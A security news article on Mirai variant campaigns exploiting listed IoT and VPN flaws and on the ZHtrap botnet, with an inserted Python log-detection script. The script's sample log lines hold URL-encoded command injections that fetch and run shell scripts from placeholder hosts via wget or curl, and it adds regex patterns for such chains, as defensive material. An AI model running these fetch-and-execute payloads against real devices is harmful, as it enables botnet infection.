Cybersecurity researchers on Monday unveiled a new wave of persistent attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet-connected devices.
“After being successfully exploited, the attackers attempt to download a malicious shell script, which includes further infection behaviors such as downloading and implementing Mirai variants and brute force enforcers,” Palo Alto Networks’ Unit 42 Threat Intelligence Team said in a write-up.
The rash of exploited vulnerabilities includes:
VisualDoor – SonicWall SSL-VPN remote command injection vulnerability that came to light earlier in January
CVE-2020-25506 – D-Link DNS-320 firewall remote code execution (RCE) vulnerability
CVE-2021-27561 and CVE-2021-27562 – Two Yealink Device Management vulnerabilities that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
CVE-2021-22502 – RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
CVE-2019-19356 – Netis WF2419 wireless router RCE vulnerability
CVE-2020-26919 – Netgear ProSAFE Plus RCE vulnerability
“The VisualDoor exploitation in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 220.127.116.11-43sv and 18.104.22.168-25sv releases,” SonicWall said in a statement to The Hacker News. “It’s not viable against any properly patched SonicWall tools.”
Also included in the mix are three previously undisclosed command injection vulnerabilities used against unknown targets, one of which, according to the researchers, was seen in conjunction with a separate botnet called MooBot.
The attacks are said to have been detected over the course of a month starting from Feb. 16 to as recently as March 13.
Regardless of the flaw used for initial exploitation, the attack chain is the same: the wget utility is used to download a shell script from the malware infrastructure, and that script then fetches the Mirai binaries. Mirai is a notorious piece of malware that turns Linux-based, network-connected IoT devices into remotely controlled bots, which can then be used as part of a botnet in large-scale network attacks.
Apart from downloading Mirai, additional shell scripts have been observed retrieving executables that facilitate brute-force attacks to break into vulnerable devices protected by weak passwords.
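The download-and-execute chain described above (a command injection that makes the device run wget or curl, then chmod or sh on what it fetched) leaves a recognisable trace in the web server logs of the exploited device or of any reverse proxy in front of it. The following detection script is an added example, not code from the article or from Unit 42: it URL-decodes the request path of each access-log line and flags requests that carry a downloader followed by an execution command, reporting the source IP and the download URL so a defender can block and hunt. The log lines, the `.invalid` hostnames and the CGI paths are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the article). Lines 2 and 4
# carry the download-and-execute chain the article describes, URL-encoded inside
# a request parameter; the download hosts are placeholder .invalid domains.
SAMPLE_LOG = """\
198.51.100.7 - - [16/Feb/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.9 - - [16/Feb/2021:10:02:44 +0000] "GET /cgi-bin/device.cgi?host=%27%0Acd%20%2Ftmp%3Bwget%20http%3A%2F%2Fpayload.invalid%2Fbot.sh%3Bchmod%20777%20bot.sh%3Bsh%20bot.sh%0A%27 HTTP/1.1" 200 0
203.0.113.5 - - [16/Feb/2021:10:03:01 +0000] "POST /api/update HTTP/1.1" 200 44
203.0.113.8 - - [16/Feb/2021:10:05:19 +0000] "GET /login.cgi?cmd=%60curl%20-s%20http%3A%2F%2Fdrop.invalid%2Fstage1.sh%20%7C%20sh%60 HTTP/1.1" 404 0
"""

# Common/combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Stage 1 of the chain: a downloader invoked as a command.
DOWNLOAD_RE = re.compile(r'\b(wget|curl|tftp)\b', re.I)
# Stage 2: an execution or permission command that starts a new shell token
# (preceded by a separator), so a file name such as "bot.sh" does not match.
EXEC_RE = re.compile(r'(?:^|[;|&`\s])(?:sh|bash|chmod)\b', re.I)
# The URL the downloader is told to fetch; stops at shell metacharacters.
URL_RE = re.compile(r'(?:https?|tftp|ftp)://[^\s;|&\'"`]+', re.I)


def decode_request_path(path: str) -> str:
    """URL-decode repeatedly (attackers often double-encode) until stable."""
    prev, cur = None, path
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def find_download_chains(log_text: str) -> list:
    """Return one record per request whose decoded path contains a
    downloader followed by an execution command."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        decoded = decode_request_path(m.group("path"))
        dl = DOWNLOAD_RE.search(decoded)
        if dl is None or EXEC_RE.search(decoded) is None:
            continue  # needs both stages to count as a chain
        url = URL_RE.search(decoded)
        hits.append({
            "src_ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "downloader": dl.group(1).lower(),
            "url": url.group(0) if url else None,
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    for hit in find_download_chains(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['src_ip']} -> {hit['downloader']} "
              f"{hit['url']} (HTTP {hit['status']})")
```

The status code is kept on purpose: a 200 on a request that carries this chain suggests the injection point exists and the device may already be compromised, whereas a 404 is more likely an opportunistic scan against a path the device does not have. Either way the source IP and download URL are worth feeding into a blocklist and into outbound-traffic hunting for the same host.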
“The IoT domain remains an easy-to-reach target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have disastrous consequences,” the researchers said.
New ZHtrap Botnet Traps Victims Using Honey Pot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that uses a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet called Matryosh.
Honeypots are normally a defender’s tool: decoys that lure attackers so their activity can be observed and more can be learned about their modus operandi. ZHtrap turns the same idea around by integrating a scanning-IP collection module that records the addresses of hosts connecting to the infected device and uses them as targets for further worm-like propagation.
It achieves this by listening on 23 designated ports and recording the IP addresses that connect to them, then probing the collected addresses for four vulnerabilities in order to inject the payload –
“ZHtrap propagation uses four N-day vulnerabilities, the primary function being DDoS and scanning, while integrating some outdoor features,” the researchers said. “Zhtrap installs a honey pot on the infected device, [and] takes snapshots for the victim devices, and disables running new commands based on the snapshot, thereby achieving selectivity over the device.”
After it takes over a device, ZHtrap takes a cue from the Matryosh botnet by using Tor for command-and-control communications to download and execute additional payloads.
Noting that the attacks began from February 28, 2021, the researchers said that ZHtrap’s ability to turn infected devices into honey pots marked the “interesting” evolution of botnets to facilitate finding more targets.
These Mirai-based botnets are the latest to emerge on the threat landscape, in part because the Mirai source code has been available on the Internet since 2016, leaving the field open for other attackers to build their own variants.
In March last year, researchers discovered a Mirai variant called “Mukashi,” which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira’s IoT research team identified another variant of the Mirai botnet called “Katana,” which took advantage of remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 switches.